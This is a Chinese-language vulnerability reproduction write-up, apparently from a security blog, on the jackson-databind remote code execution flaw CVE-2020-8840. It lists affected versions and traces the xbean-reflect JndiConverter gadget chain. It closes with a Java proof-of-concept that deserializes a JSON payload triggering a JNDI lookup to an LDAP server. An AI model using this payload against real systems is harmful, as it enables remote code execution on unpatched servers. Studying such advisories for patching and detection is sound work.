002-CVE-2020-8840 FasterXML jackson-databind 远程代码执行漏洞

# CVE-2020-8840 FasterXML jackson-databind 远程代码执行漏洞

### 一、漏洞简介

FFasterXML/jackson-databind是一个用于JSON和对象转换的Java第三方库,可将Java对象转换成json对象和xml文档,同样也可将json对象转换成Java对象。

此次漏洞中攻击者可利用xbean-reflect的利用链触发JNDI远程类加载从而达到远程代码执行。

### 二、漏洞影响

jackson-databind 2.0.0 – 2.9.10.2

经验证fastjson在开启了autoType功能的情况下,影响最新的fastjson v1.2.62版本

### 三、复现过程

可以在git提交记录中清楚看到利用的具体类

![](/static/lingzu/images/15890245585316.png)

分析下利用链,通过传进参数asText,触发setter,setAsText()函数

![](/static/lingzu/images/15890245668475.png)

随后跟进toObject()函数

![](/static/lingzu/images/15890245761481.png)

最终进到JndiConverter重写的toObjectImp()函数

![](/static/lingzu/images/15890245886279.png)

此时出现经典的JNDI注入,text 刚好就是我们传进的asText,我们可控,从而达到命令执行目的

![](/static/lingzu/images/15890245973710.png)

**poc**

“`
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;

public class Poc {
public static void main(String args[]) {
ObjectMapper mapper = new ObjectMapper();

mapper.enableDefaultTyping();

String json = “[\”org.apache.xbean.propertyeditor.JndiConverter\”, {\”asText\”:\”ldap://localhost:1389/ExportObject\”}]”;

try {
mapper.readValue(json, Object.class);
} catch (IOException e) {
e.printStackTrace();
}

}
}
“`

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容